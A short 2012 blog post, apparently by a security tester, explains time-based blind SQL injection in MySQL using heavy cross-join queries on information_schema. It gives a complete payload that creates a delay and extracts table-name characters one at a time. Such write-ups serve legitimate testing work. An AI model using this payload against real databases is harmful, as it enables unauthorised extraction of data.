Friday, February 10, 2012

Time Based SQL Injection using heavy queries in MySQL

During my work I had to test Time Based SQL Injection in MySQL. But many blogs showcased ways to achieve this using SLEEP() and BENCHMARK() routines. SLEEP() routine is not available in MySQL 4.0 so the correct routine should be used based on the MySQL version.

There is another approach for Time Based SQL Injection which is Time Based SQL Injection using heavy queries. This is used for Databases which do not have timing routines such Oracle.

But to test effectively both 4.0 and 5.0 versions of MySQL I had to write a Time Based SQL Injection using heavy queries. After some googling and reading articles I came up with the following query which produces a half a second delay.

SELECT * FROM <ANY TABLE NAME> WHERE 1=1 AND
(SELECT COUNT(*)
 FROM information_schema.columns AS col1
 NATURAL JOIN information_schema.columns AS col2,
information_schema.columns AS col3,
 information_schema.columns AS col4,
 information_schema.columns AS col5,
 information_schema.columns AS col6,
 information_schema.columns AS col7,
 information_schema.columns AS col8,
information_schema.columns AS col9,
information_schema.columns AS col10)=0
AND 300>
(SELECT ASCII(SUBSTRING(table_name,1,1))
 FROM information_schema.columns
 ORDER BY table_name
 LIMIT 1);

This was tested on MySQL 5.0 with information_schema.columns table containing 346 rows.

No comments:

Post a Comment